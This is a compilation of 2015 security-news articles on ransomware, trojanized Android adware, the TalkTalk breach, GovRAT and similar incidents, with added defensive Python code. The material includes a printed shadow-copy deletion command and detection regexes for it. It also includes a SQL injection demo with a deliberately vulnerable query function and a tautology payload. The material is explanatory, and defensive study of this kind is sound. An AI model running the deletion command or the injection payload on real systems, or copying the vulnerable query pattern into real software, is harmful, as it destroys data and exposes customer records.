It is not clear whether the patches were released because the attacker exploited a zero-day flaw in the platform; the hacker in fact claimed to have compromised the vBulletin.com database by exploiting an unknown vulnerability. On Monday, the hacker using the online moniker “Coldzer0” started offering for sale a zero-day vBulletin exploit (“vBulletin 5.x.x Remote Code Execution 0day Exploit”) on a website that specializes in exploit trading.

On Tuesday, after vBulletin released the security patches, the Twitter account @_cutz published the details of a remote code execution flaw in vBulletin. Experts speculate that the flaw has existed for the past three years.

[Image: vBulletin zero-day]

The offer also includes a video PoC of the vBulletin zero-day exploit.

vBulletin is a very popular platform, it is used by more than 100,000 community websites, including some operated by Electronic Arts, Sony Pictures and Valve Corporation.

vBulletin is urging all users to update their installations as soon as possible.

Offline Ransomware is spreading among Russian users


Malware researchers at Check Point Technologies have discovered a new offline ransomware that is targeting mainly Russian users.
Malware researchers at Check Point Technologies have spotted a new “offline” ransomware that is targeting Russian users. The principal characteristic of this strain of malware is that it doesn’t need to communicate with a command and control (C&C) server in order to encrypt files.

This design complicates analysis by security firms, because there is no communication with a control center to detect.

The offline ransomware has been around since at least June 2014; the experts highlighted that the threat actors behind the campaign have already released numerous variants of the malware.

[Image: offline ransomware 2]

The latest version of the offline ransomware (CL) was released in August 2015. The threat is well known to the principal security firms, which detect it under various names (Ransomcrypt.U [Symantec], Win32.VBKryjetor.wfa [Kaspersky] and Troj/Ransom-AZT [Sophos]).

Once the ransomware infects the victim’s PC, it encrypts the victim’s files and changes the desktop background to display a message in Russian that includes the instructions to recover the files.

[Image: offline ransomware]

“Your files are encrypted, if you wish to retrieve them, send 1 encrypted file to the following mail address: Seven_Legion2@aol.com
ATTENTION!!! You have 1 week to mail me, after which the decryption will become impossible!!!!”

All the files on the machine infected by the CL version, the one analyzed by the researchers at Check Point Technologies, were encrypted, and each one was renamed using the following format:

email-[address to contact].ver-[Ransomware internal version].id-[Machine identifier]-[Date & Time][Random digits].randomname-[Random name given to the encrypted file].cbf

One of the renamed files looked like this:

email-Seven_Legion2@aol.com.ver-CL 9@53@19 AM5109895.randomname-EFWMERGVKYNBPETHVKZNBQETHWKZNB.RGV.cbf
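The naming scheme above carries useful triage data (the attacker contact address, the internal version, the machine identifier) that an incident responder can pull out of a directory listing without touching the file contents. The parser below is an added example written for this article, not Check Point's tooling; the field names (`machine_id`, `time_and_digits`, `random_name`) are this example's own labels for the bracketed parts of the format, and the second sample file name is constructed to exercise the full scheme (its version, machine id and timestamp values are made up).

```python
import re
from typing import Dict, List, Optional

# Parser for the renaming scheme that Check Point describes for the CL version:
#   email-[address].ver-[version].id-[machine id]-[date & time][random digits].randomname-[name].cbf
# The ".id-<machine id>-<date & time><random digits>" section is optional in this
# pattern so that a truncated name (such as the sample quoted in the article)
# still yields the contact address, version and random name.
CBF_NAME_RE = re.compile(
    r"^email-(?P<email>[^@\s]+@\S+?)"
    r"\.ver-(?P<version>.+?)"
    r"(?:\.id-(?P<machine_id>[^-]+)-(?P<time_and_digits>.+?))?"
    r"\.randomname-(?P<random_name>.+)\.cbf$"
)


def parse_cbf_name(path: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the fields encoded in an encrypted file name, or None if the
    name does not follow the scheme. Accepts Windows or POSIX paths."""
    name = re.split(r"[\\/]", path)[-1]
    m = CBF_NAME_RE.match(name)
    return m.groupdict() if m else None


def triage(paths: List[str]) -> Dict[str, List[Dict[str, Optional[str]]]]:
    """Group encrypted files by the attacker contact address they carry, so a
    responder can see at a glance which campaign variant hit a host."""
    by_email: Dict[str, List[Dict[str, Optional[str]]]] = {}
    for p in paths:
        info = parse_cbf_name(p)
        if info is not None:
            by_email.setdefault(info["email"], []).append(info)
    return by_email


# Sample file names. The first is the sample quoted in the article; the second
# is a constructed name following the full documented scheme (the version,
# machine id and timestamp are made up); the third is an untouched document.
SAMPLE_PATHS = [
    "email-Seven_Legion2@aol.com.ver-CL 9@53@19 AM5109895.randomname-EFWMERGVKYNBPETHVKZNBQETHWKZNB.RGV.cbf",
    r"C:\Users\victim\Documents\email-madeled@mail.ru.ver-CL 1.0.id-12345678-01@01@2015 10@00@00 AM12345.randomname-ABCDEFGHIJ.XYZ.cbf",
    r"C:\Users\victim\Documents\quarterly_report.docx",
]

if __name__ == "__main__":
    for email, files in triage(SAMPLE_PATHS).items():
        print(f"{email}: {len(files)} encrypted file(s)")
        for f in files:
            print("  version:", f["version"], "| machine id:", f["machine_id"],
                  "| random name:", f["random_name"])
```

Run over the output of a recursive directory listing, the grouping by contact address is a quick way to tell whether one or several variants touched the machine, and the machine identifier, when present, is what a victim would have been asked to quote to the operator.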

Victims are asked to pay a ransom between $300 and $380, depending on how fast they perform the payment, to receive a decryption tool and the key needed to recover their files.

The offline ransomware is written in Delphi and uses some Pascal modules, an uncommon choice for malware developers. The experts explained that the file-encrypting capabilities implemented by the offline ransomware are highly efficient; it is nearly impossible to recover the files once the threat has encrypted them.

Check Point has provided the following description of the file encryption process:

1. The beginning (first 30000 bytes) of each file is encrypted using two buffers of digits and letters that are randomly generated on the infected machine. The encryption process includes taking each original byte along with one byte from each of the randomly generated buffers and performing mathematical operations on them.

2. The remainder of each file (if it exists) is encrypted using an RSA public key (“local”) that is randomly generated on the infected machine, along with the matching local RSA private key required for decryption of the data.

3. The randomly generated buffers and the local RSA private key that are required for decryption are added as metadata to each encrypted file, and are then encrypted using three hardcoded RSA 768 public keys that the offender created in advance (“remote”). The matching remote RSA private keys required to unlock the metadata are located on the attacker’s side.

The threat actors used several email addresses in their campaign, most of them AOL and Gmail accounts. It is interesting to note that the only account related to a Russian email provider, madeled@mail.ru, is also one of the emails associated with the original version of the offline ransomware. The address was no longer used by the crooks after the version

[Image: offline ransomware email]

Ransomware is very profitable for cybercriminals: according to security researchers at the Cyber Threat Alliance, who investigated the cybercriminal operations leveraging the CryptoWall ransomware, the criminals behind CryptoWall 3.0 made $325 million.

New malware appears in the wild on a weekly basis; recently the fourth version of the popular CryptoWall was detected online, and more are expected to come.

Trojanized adware: already infected more than 20,000 Android Apps

Researchers at Lookout firm have come across a new malicious adware family distributed via trojanized versions of popular Android applications.
Researchers at mobile security firm Lookout have come across a new malicious adware family distributed via trojanized versions of popular Android applications.

Security experts at Lookout have discovered a new strain of adware dubbed Shuanet, which is distributed via trojanized versions of popular Android apps, including Okta’s two-factor authentication application, Candy Crush and Facebook.

Shuanet is able to gain root access to the infected device without the user’s knowledge; the malware installs itself as a system application and is very hard to remove from the device.

The researchers at Lookout have discovered more than 20,000 popular Android applications that were trojanized with the adware families Shedun, Kemoge and Shuanet and distributed through third-party repositories. The trojanized versions of the mobile apps are fully functional and for this reason don’t raise suspicion. It is important to note that the threat actors behind the campaign avoided compromising antivirus apps, a circumstance that suggests a high level of planning when creating these malware campaigns.

“Lookout has detected over 20,000 samples of this type of trojanized adware masquerading as legitimate top applications, including Candy Crush, Facebook, GoogleNow, NYTimes, Okta, Snapchat, Twitter, WhatsApp, and many others.” Lookout’s Michael Bentley wrote in a blog post. “Malicious actors behind these families repackage and inject malicious code into thousands of popular applications found in Google Play, and then later publish them to third-party app stores.”

The expert observed the majority of the Shuanet adware infections in the United States, Germany, Iran, Russia, India, Jamaica, Sudan, Brazil, Mexico, and Indonesia.

Lookout researchers believe that the threat actors behind the Kemoge, Shedun and Shuanet adware campaigns are different groups, but the adware families appear to be linked. In some cases, the malware variants analyzed share between 71 and 82 percent of their code, a circumstance that suggests the authors used the same pieces of code to build their versions of the auto-rooting adware.

Kemoge and Shuanet adware share at least three exploits to root devices.

[Image: adware android]

“While historically adware hoped to convince the user to install new applications by showing banners and annoying pop ups, now it can install these third party apps without user consent. In this way it can heavily capitalize on the Cost Per Install paid out by web marketing companies,” Lookout’s Michael Bentley said in a blog post. “Unfortunately, should the revenue model change on clicks-per-install and ads, this may lead to malware authors using this privilege escalation for new monetization strategies.”

According to the experts, it is easy to predict that this type of trojanized adware will become even more sophisticated over time.

“We expect this class of trojanized adware to continue gaining sophistication over time, leveraging its root privilege to further exploit user devices, allow additional malware to gain read or write privileges in the system directory, and better hide evidence of its presence and activities.”

Cracka hackers who doxed CIA Chief now hit the FBI Deputy Director

Cracka, the crew of young hackers who doxed the CIA Director John Brennan, has now hit the FBI Deputy Director Mark Giuliano’s wife by hacking her email account.
I always say, give a keyboard and an Internet connection to a kid and he could destroy your company. It is not a joke: the effort needed to launch a cyber attack is smaller than in the past, and the economics of an attack favor the striker, who faces a very low cost compared to the defender and can cause devastating damage.

Recently, four teens were arrested in connection with the TalkTalk data breach; meanwhile, a group of alleged teenagers has hacked the personal email account of the CIA Director John Brennan.

The group of young hackers calls themselves “Crackass” (Cracka), and now it seems they are targeting other US Government officials; they are arrogant and heedless of the fact that the Feds are on their trail.

“Now the hackers are back at it, despite the fact that the FBI is investigating them, and that some law enforcement officials anonymously said the government is going to “make an example” out of them.” explained Lorenzo Bicchierai on Motherboard.

One of the members of the cyber gang “Cracka” told Motherboard that they have now hacked the email account belonging to another illustrious US official, the FBI Deputy Director Mark Giuliano.

This time the hackers violated a Comcast email account belonging to Giuliano’s wife; they also published online a series of screenshots to prove they were in the account. The attackers haven’t provided further information on the method they used to take over the email account.

An email account, even your wife’s, is rich in valuable information such as your contact list, but it could include more data, such as information about your next trip or the results of a clinical examination you have undergone. In this case, the hackers found Giuliano’s mobile phone number in the email account’s contact list and called him.

“I called it and asked for Mark and he’s like ‘I don’t know you but you better watch your back’ and then he hung up and I kept calling and he was getting mad then he didn’t pick up,” Cracka told Motherboard via online chat.

[Image: hacker CIA 3]

The FBI still hasn’t commented on the alleged hack of the Giuliano email account.

The hacking crew targeted the FBI official because the Feds are investigating on them

Cracka said that they were not looking to get any information out of this hack; it was an action conducted for revenge.

“We didn’t target him for anything interesting, we targeted him because FBI are [sic] investigating us,” he said.
Lorenzo Bicchierai, who had the opportunity to view the screenshots shared by Cracka, confirmed that the account doesn’t appear to contain any sensitive information, except the contact list.

Still, this contact list could be a good starting point for skilled hackers, who could use it to target the family and friends of the couple in order to gather further information for a subsequent attack.

Stay tuned, and thanks to Lorenzo Bicchierai for his excellent post.

CryptoWall 4.0 Released with a New Look and Several New Features

The fourth member of the CryptoWall family of ransomware, CryptoWall 4.0, has just been released, complete with new features and a brand new look.
We recently reported that CryptoWall 3.0 has allegedly caused over $325 million in annual damages. CryptoWall first emerged in April 2014. Its first major upgrade was dubbed CryptoWall 2.0, and first emerged in October 2014. CryptoWall 3.0 then emerged in January 2015 and terrorized organizations on a global scale. Now, in November 2015, CryptoWall 4.0 has emerged.

New Features

New features such as the encryption of the names and extensions of affected files have emerged with the 4th member of the CryptoWall family. Additionally, CryptoWall 4.0 has changed the name of its ransom notes to HELP_YOUR_FILES.TXT and HELP_YOUR_FILES.HTML.

The ransom note itself contains payment instructions and also mocks the infected user.

[Image: CryptoWall 4.0 ransom note]

Spread Method

The initially reported sample, provided by an infected user on the Bleeping Computer forums, was spread through phishing e-mails with ZIP archive attachments claiming to be resumes. The file within the ZIP archive is an obfuscated and beautified JavaScript file that downloads the CryptoWall 4.0 payload from a hard-coded URL.

[Image: CryptoWall 4.0 2]

However, it’s likely that exploit kits will begin to deliver CW4 as a payload very soon, if they are not already (especially the Angler EK).

Technical Information

The C&C communication and behavioural activity of CryptoWall 4.0’s payload is quite similar to its earlier versions. The specific sample that I have analyzed performed the following actions, as can be evidenced by the below images.

Contacted Domains

[Image: CryptoWall 4.0 3]

Added Files

[Image: CryptoWall 4.0 5]

Deleted Files

[Image: CryptoWall 4.0 6]

Modified Files

[Image: CryptoWall 4.0 7]

Added Registry Keys

[Image: CryptoWall 4.0 8]

Process Tree

exe -k netsvcs
EXE "C:\Users\Administrator\Desktop\HELP_YOUR_FILES.TXT"
exe "C:\Users\Administrator\Desktop\HELP_YOUR_FILES.HTML"
exe Delete Shadows /All /Quiet
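The last line of that process tree is the one worth alerting on: deleting every shadow copy with the /All /Quiet switches removes the victim's easiest recovery path and is almost never done by legitimate software. Below is an added example, not part of the original analysis, of detection logic run over constructed process-creation records in the style of a Sysmon Event ID 1 log. The executable names, PIDs and parent relationships in the sample events are made up; only the command-line shapes come from the process tree above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed process-creation records modelled on Sysmon Event ID 1. The
# command lines mirror the process tree in the article; image names, PIDs and
# parent PIDs are invented for the example.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 812, "ppid": 600, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 2044, "ppid": 1208, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'NOTEPAD.EXE "C:\Users\Administrator\Desktop\HELP_YOUR_FILES.TXT"'},
    {"pid": 2052, "ppid": 1208, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": r'iexplore.exe "C:\Users\Administrator\Desktop\HELP_YOUR_FILES.HTML"'},
    {"pid": 2060, "ppid": 1208, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 2100, "ppid": 600, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},   # benign: listing, not deleting
]

# vssadmin deleting shadow copies. Matching on "delete shadows" rather than the
# exact switches keeps the rule robust to reordered or omitted /All /Quiet.
SHADOW_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.IGNORECASE)
# Any process opening the CryptoWall 4.0 ransom note by name.
RANSOM_NOTE_RE = re.compile(r"\bHELP_YOUR_FILES\.(?:TXT|HTML)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    pid: int
    ppid: int
    cmdline: str


def check_event(evt: Dict[str, object]) -> List[Alert]:
    """Apply both rules to one process-creation event."""
    cmd = str(evt.get("cmdline", ""))
    pid, ppid = int(evt["pid"]), int(evt["ppid"])
    alerts: List[Alert] = []
    if SHADOW_DELETE_RE.search(cmd):
        alerts.append(Alert("shadow_copy_deletion", "high", pid, ppid, cmd))
    if RANSOM_NOTE_RE.search(cmd):
        alerts.append(Alert("cryptowall4_ransom_note_opened", "medium", pid, ppid, cmd))
    return alerts


def scan(events: List[Dict[str, object]]) -> List[Alert]:
    """Run the rules over a batch of events and return every alert."""
    return [a for evt in events for a in check_event(evt)]


def alerts_per_parent(alerts: List[Alert]) -> Dict[int, int]:
    """Count alerts by parent PID. One parent that both opens the ransom note
    and wipes shadow copies is the ransomware process to isolate first."""
    counts: Dict[int, int] = {}
    for a in alerts:
        counts[a.ppid] = counts.get(a.ppid, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.severity}] {a.rule}: pid={a.pid} ppid={a.ppid} {a.cmdline}")
    print("alerts per parent:", alerts_per_parent(found))
```

The shadow-copy rule will also fire on the rare administrator who clears snapshots by hand, so scope it to workstations or pair it with the parent-PID grouping: the grouping is what turns three isolated hits into one incident pointing at a single process.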

Voice as a threat: VoLTE, a new tool to compromise mobile networks

While communication technology providers are seeking consensus over the future of 5G networks, carriers are wasting no time in rolling out new technologies available for the current 4G networks. Voice over LTE or simply VoLTE is one of these technologies. VoLTE allows transmitting voice calls over data layers.

Something's wrong with VoLTE

What exactly does that mean? Well, let us explain some technical details. Today’s cellular networks employ three ‘planes’: data, voice and control. We typically use the data plane for mobile Internet and the voice plane for voice calls. The third plane, to put it simply, is used to manage everything that happens on the other two planes.

Traditional cellular networks handle voice calls through dedicated circuits. However, the 4G technology allows for the prioritization and transmission of voice traffic as packets with higher priority via the data plane. That is essentially VoLTE. The control plane packets have the highest priority. In essence, VoLTE is a sort of IP telephony (VoIP) adapted for use over cellular networks.

VoLTE brings a handful of benefits. First, ubiquitous VoLTE deployment will render existing 2G/3G infrastructures impractical and thus unnecessary to support, since VoLTE won’t require a separate infrastructure to handle voice calls. Secondly, VoLTE offers higher bandwidth compared to 3G, which boosts voice quality.

The third benefit is that VoLTE can be used for video conferencing. Last but not least, mobile carriers claim VoLTE offers better call privacy and faster connection. All in all, it looks like VoLTE has a number of critical benefits with no particular drawbacks. At least upon first impression.

As it usually happens, every breakthrough technology has its growing pains. Researchers from the University of California, in joint effort with their colleagues of Shanghai Jiao Tong University and the Ohio State University, demonstrated practical attacks on VoLTE in two US Tier-1 carriers’ networks.

The researchers managed to demonstrate how a criminal can drop all of the victim’s calls, increase the charges on the victim’s cellular bill, or, conversely, gain free mobile data access. The interesting thing is that criminals don’t need to hack networks to achieve their goals, or use expensive equipment to carry out the attacks. All they need is a smartphone, rooted or not.

The researchers’ key finding is that one can fool VoLTE and send ordinary data packets masqueraded as ‘high priority’ signaling or voice packets.

This means that a potential attacker can have carte blanche. Signaling packets are not charged for, so once you use this ‘wrapper’ for ordinary data packets, you are freed from the responsibility of paying for your data plan. As a proof of concept, the researchers had a 10-minute Skype call and the carrier never registered their consumption of data traffic.

The signal (control) plane has the highest priority, which opens a pool of opportunities to culprits. If you jam up this layer with data packets masqueraded as signal packets, the signal packets won’t have enough bandwidth available. This method could be a means of cutting network access to someone or to launch a targeted attack and arrange network downtime by jamming it with faux signal packets.

Finally, attackers can use the same method to flood the victim with data packets which, provided the victim does not have an unlimited data plan, might mean a lot of extra charges the target would need to pay to the carrier. Moreover, such attacks are not detected by firewalls, which are there to filter malicious traffic: the attack uses legitimate mobile traffic, which makes firewalls unable to detect it.

All of the above concerned the ability to transfer data packets via the signal (control) plane, but the same approach could work on the voice plane as well. For example, the researchers managed to subdue a voice call over VoLTE: a victim would accept the call but couldn’t hear anything, as voice packets were lost in the flood of faux signal packets.

The researchers offer a handful of solutions to at least partially solve the issues; both carriers whose networks were probed during the research have already deployed some of them.

Countries like Germany or Russia have just started to roll out VoLTE services – so it may well be the case that all the carriers won’t be that fast patching the vulnerabilities.

Unfortunately, some of the vulnerabilities cannot be patched without making changes to VoLTE as a standard. Of course, carriers could be more vigilant about what happens in their networks and make sure to cut off signaling traffic between any devices except for legitimate connections between a phone and a signaling server, but that is never enough.

To fix all VoLTE issues, there is a need for a joint effort of OEMs, chipset vendors, carriers and standardization bodies.

That’s the reason why the researchers try to widely publicize this problem: the more widely acknowledged the problem would become, the faster the solutions would be found.

Users, on their end, should treat their mobile security more seriously: in order to carry out the described attacks, adversaries would have to install a malicious app on the smartphone. Such mobile malware is very likely to be detected by good security software.

And, finally, the absolute majority of popular devices and 4G active networks don’t support VoLTE at all so far. Let us hope that, by the time VoLTE becomes a ubiquitous service, all security issues will be solved.

GovRAT, the malware-signing-as-a-service platform in the underground

Security Experts at InfoArmor discovered GovRAT, a malware-signing-as-a-service platform that is offered to APT groups in the underground.
In the past, I have explained why digital certificates are so attractive for crooks and intelligence agencies; one of the most interesting uses is signing malware code in order to fool antivirus software. Naturally, digital certificates are becoming a precious commodity in the underground ecosystem, and many operators in the black markets have started this lucrative business.

A few weeks ago experts at IBM Security X-Force observed the offer of certificates in the Dark Web with a sales model they called CaaS (Certificates as a Service). Cybercriminals use the Dark Web to sell high-grade code-signing certificates, which they have obtained from trusted certificate authorities, to anyone interested in purchasing them.

The sale of code signing certificates has increased considerably over the past few months, a trend confirmed also by a recent research analysis conducted by the threat intelligence firm InfoArmor.

The research uncovered a case in which a hacker tricked a legitimate certificate authority into issuing digital certificates for malware before offering a cyber-espionage tool called GovRAT.

GovRAT is a hacking platform for malware creation that comes bundled with digital certificates for code signing. The same digital certificates were initially offered for sale on the black marketplace TheRealDeal Market hosted on the Tor network. GovRAT was offered for sale at 1.25 Bitcoin, but experts observed that the creator is now selling it privately.

[Image: GovRAT digital certificates]

The GovRAT tool digitally signs malicious code with code-signing tools such as Microsoft SignTool, WinTrust, and Authenticode technology. The experts believe that the final customers for GovRAT are APT groups targeting political, diplomatic and military employees of more than 15 governments worldwide.

The strains of malware analyzed by the researchers at InfoArmor were signed individually with different digital certificates.

InfoArmor also reported that seven banks, some in the US, and 30 defence contractors have been targeted by GovRAT. It has been estimated that more than 100 organizations have been hit by malware created with the GovRAT platform since early 2014.

What is the price of code-signing digital certificates?

Experts at InfoArmor found these precious commodities on many underground black markets, offered for sale at a price between $600 and $900 depending on the CA that issued them. It is quite easy to find code-signing digital certificates issued by Comodo, GoDaddy and Thawte. Digital certificates can of course be revoked by the CA, but as explained by numerous sellers this is rare, and companies are often very slow in invalidating them.

“[The buyers are] blackhats (mostly state-sponsored), malware developers,” Andrew Komarov, CIO at InfoArmor, told El Reg. “It is pretty professional audience, as typical script kiddies and cybercriminals don’t need such stuff. It is used in APTs, organised for targeted and stealth attacks. The appearance of such services on the blackmarket allow [hackers] to perform them much more easily, rather like Stuxnet.” “It is a pretty specific niche of modern underground market,” “It can’t be very big, as the number of certificates is pretty limited, and it is not easy to buy them, but according to our statistics, the number of such services is significantly growing.”

Stolen or fake certificates are typically used in state-sponsored attacks; they were used in numerous offensives, including Stuxnet and the Sony hack. The experts explained that cybercriminals obtain digital certificates through resellers.

“Bad actors buy digital certificates through resellers, where the due diligence of customers is pretty poor,” Komarov explained. “They provide fake names, or fake information about the author and purpose on why they need this certificate, and receive it. After they have received such certificates, they trade it on the blackmarket for malware developers, allowing them to create signed malware for further APT in several minutes.”

InfoArmor reported the case of certs4you.org, a website that offered malware-signing-as-a-service with prepared digital certificates before the domain was suspended.

Let me suggest reading the report on GovRAT published by InfoArmor.

Researcher releases Free Hacking Tool that Can Steal all Your Secrets from Password Manager

Unless you are a human supercomputer, remembering a different password for every site is not an easy task.
But to solve this problem, there is a growing market of password managers and lockers, which remembers your password for every single account and simultaneously provides an extra layer of protection by keeping them strong and encrypted.
However, that holds only until a hacker releases a tool that can silently decrypt and extract all usernames, passwords, and notes stored by the popular password manager KeePass.
Dubbed KeeFarce, the hacking tool is developed by Kiwi hacker Denis Andzakovic and is available on GitHub for free download.
Hackers can execute KeeFarce on a computer when a user has logged into their KeePass vault, which makes them capable of decrypting the entire password archive and then dumping it to a file that attackers can steal remotely.
How Does KeeFarce Work?
KeeFarce obtains passwords by leveraging a technique called DLL (Dynamic Link Library) injection, which allows third-party apps to tamper with the processes of another app by injecting an external DLL code.
The injected code then calls an existing KeePass export method to export the contents of a currently open database, including user names, passwords, notes, and URLs to a clear-text CSV file.
The key takeaway here is:
KeeFarce is just a password extraction tool, but combined with malware on the victim's computer it would work perfectly as a password stealer for remote hacking.
If that happens, it is game over: you will have much bigger things to worry about, since most of your accounts are generally already logged in on that machine.
While KeeFarce is specifically designed to target KeePass password manager, it is possible that developers can create a similar tool that takes advantage of a compromised machine to target virtually every other password manager available today.

Fourth, a 16-year-old Hacker, Arrested over TalkTalk Hack

Police have arrested a fourth person, a 16-year-old boy, from London in connection with the high-profile hack of British telecoms giant TalkTalk.
The investigating officers from the Metropolitan Police Cyber Crime Unit (MPCCU) arrested the teenager at his home in Norwich on suspicion of Computer Misuse Act offences.
TalkTalk was subjected to a 'significant and sustained' hacking attack on its official website two weeks back, which put the Bank Details and Personally Identifiable Information (PII) of its 4 Million customers at risk.
The telco confirmed last week that at most 1.2 Million names, email addresses and phone numbers and around 21,000 unique bank account numbers and sort codes were compromised in the attack.
However, TalkTalk said that the stolen credit card details were incomplete, so the payment cards could not be used for any false financial transactions. But, the company advised customers to remain vigilant against financial fraud.
Security experts believe that the recent hacking attack on TalkTalk may have been carried out via a SQL injection (SQLi) attack, a technique in which SQL commands are injected through application input to query the database and get access to the users' personal data.
This is the fourth arrest since TalkTalk suffered a massive data breach and the 16-year-old boy remains in custody at a local police station.
The Police Service of Northern Ireland and MET detectives arrested a 20-year-old Staffordshire man on Sunday while 2 teenagers were also arrested in connection with the Data breach incident.
The first arrest came last week when police arrested and then bailed a 15-year-old boy from Northern Ireland while another 16-year-old boy from London was arrested and bailed on 30 October.
However, the connection between these four persons has not been known yet.
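The SQL injection mentioned above is worth seeing in code, since the fix is a one-line change. What follows is an added example, not code from TalkTalk or from the article: a constructed SQLite customer table (all rows invented), a lookup that builds the statement by string interpolation, and the same lookup written with a parameterised query. The tautology input is the textbook shape of a probe; the point is that the parameterised version returns nothing for it.

```python
import sqlite3
from typing import List, Tuple

# Constructed demo table standing in for the kind of customer record the
# article says was exposed (names, phone numbers, sort codes). Rows are made up.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, phone TEXT, sort_code TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (email, phone, sort_code) VALUES (?, ?, ?)",
        [("alice@example.net", "07700 900001", "12-34-56"),
         ("bob@example.net", "07700 900002", "23-45-67"),
         ("carol@example.net", "07700 900003", "34-56-78")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> List[Tuple]:
    """Builds the SQL text by string interpolation. A single quote in the input
    closes the string literal and whatever follows is executed as SQL."""
    query = f"SELECT email, phone, sort_code FROM customers WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str) -> List[Tuple]:
    """Parameterised query: the driver sends the value separately from the SQL
    text, so user input can never alter the statement's structure."""
    return conn.execute(
        "SELECT email, phone, sort_code FROM customers WHERE email = ?", (email,)
    ).fetchall()


# The classic tautology input: makes the WHERE clause true for every row when
# it is pasted into the SQL text, and is simply a non-existent address otherwise.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    db = build_demo_db()
    print("normal lookup (safe):     ", lookup_safe(db, "bob@example.net"))
    print("tautology via interpolation:", lookup_vulnerable(db, TAUTOLOGY))  # every row
    print("tautology via parameters:   ", lookup_safe(db, TAUTOLOGY))        # no rows
```

The vulnerable function is also the one that would have let an attacker reach a whole table of "email addresses and phone numbers" with a single request; a code review or a grep for f-strings and `%` formatting inside `execute(` calls is the cheapest way to find this pattern in a codebase.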

A Fourth Teenager was arrested over TalkTalk data breach

British police announced Tuesday they had arrested a fourth teenager in connection with a data breach suffered by the Internet Service Provider TalkTalk.
The investigation into the TalkTalk data breach is still ongoing; within a few days two more suspects have been arrested by law enforcement under the country’s Computer Misuse Act. The company has suffered two other cyber attacks in eight months that caused the theft of customer data. A few days ago a third man, a 20-year-old from Staffordshire, was arrested in connection with the TalkTalk hack and released on bail until March.

Investigators believe that he is a member of the group that hacked the telco TalkTalk, stealing 1.2 million customer records (email addresses, names, phone numbers and dates of birth) along with nearly 28,000 partial credit and debit card numbers.

[Image: TalkTalk HQ]

According to a statement from the Metropolitan Police, a fourth hacker was arrested, another teen that is from Norwich.

The ISP TalkTalk admitted that some of the data stolen by the hackers was not encrypted; it classified the attack as “significant and sustained” but downgraded the risk of financial theft resulting from the hack.

TalkTalk confirmed that it is supporting the investigation conducted by the National Crime Agency and law enforcement. Many aspects of the incident are still unclear; let me remind you that the company was hit by a DDoS attack before the data breach, and that an alleged LulzSec member claimed responsibility for it while denying any involvement in the data breach.

Someone also sent a ransom demand to TalkTalk, but no news has been provided on its origin and authenticity.

Chimera, a new strain of ransomware in the wild

According to a German website, a new strain of ransomware dubbed Chimera also threatens to publish the victim’s personal data on the Internet.
A new ransomware strain named Chimera is targeting German companies. This time the crooks do not limit their extortion scheme to file encryption: they also threaten to release the victim’s sensitive data on the Internet.
Chimera’s attack vector is email. Bogus messages are sent to company employees, either offering them a job or applying for a position; they contain a link to a Dropbox address and try to lure employees into visiting it by claiming that further information is available there.

When victims click the link they download the Chimera ransomware, which, once installed, encrypts user data on the local system and on network-connected drives. The ransomware then displays a ransom note to the victim.


Victims must pay 2.45 Bitcoin (around €630/$694) to decrypt their files. If they do not pay, the crooks threaten to publish the stolen data, along with the victim’s name, on the Internet.

The researchers at Botfrei, who first spotted the malware, confirmed that there is no evidence that the criminals have actually leaked any stolen data online.

“There is so far no evidence or information whether the criminals have stolen from affected systems or are already published on the Internet personal information!” states a blog post published on Botfrei.
It is likely that the criminals cannot exfiltrate the encrypted data at all: the volume of files involved can be expected to be significant, and no evidence of data theft has been found.

“Another problem with the edentulous threat posed by this ransomware is that the implication of a threatened personal information disclosure would assume that someone is combing through the files for that personal information,” explained the InfoSec analyst Bob Covello.

“This is a level of involvement that most ransomware criminals do not want to broach. Ransomware is designed for a quick payday for the criminals with little interaction with the victim.”

The primary defense against ransomware is an up-to-date backup of the most important documents, kept offline or otherwise out of reach of the malware, which also encrypts network-connected drives.

Project Zero Experts Found critical flaws in Samsung Galaxy S6 Edge

Experts at Google’s Project Zero have discovered a number of high severity flaws in the Android OS build running on Samsung Galaxy S6 Edge smartphones.
Google Project Zero is examining the Android builds that manufacturers other than Google ship on their own devices.

The major manufacturers customize the Android Open Source Project (AOSP) source code for their devices, and the Project Zero experts wanted to test those customizations.

“The majority of Android devices are not made by Google, but by external companies known as Original Equipment Manufacturers or OEMs which use the Android Open-Source Project (AOSP) as the basis for mobile devices which they manufacture.”states the blog post published by the Project Zero team.

“OEMs are an important area for Android security research, as they introduce additional (and possibly vulnerable) code into Android devices at all privilege levels, and they decide the frequency of the security updates that they provide for their devices to carriers.”

Recently a team of ten researchers from Project Zero and other Google security teams analyzed the Samsung Galaxy S6 Edge, searching for vulnerabilities in the OS running on it.

They focused on escalating to kernel privileges from both local and remote starting points.

The researchers also tried to gain remote access to data managed by the device, including contacts, messages and photos, and to obtain persistence on the phone.


After a week of intense testing on the Samsung Galaxy S6 Edge, the team found eleven high severity issues. The most important is a path traversal vulnerability (CVE-2015-7888) in the Samsung WifiHs20UtilityService service that can be exploited by an attacker to write arbitrary files on the device.

“There is a process running as system on the device that scans for a zip file in /sdcard/Download/cred.zip and unzips the file. Unfortunately, the API used to unzip the file does not verify the file path, so it can be written in unexpected locations.” states the post.
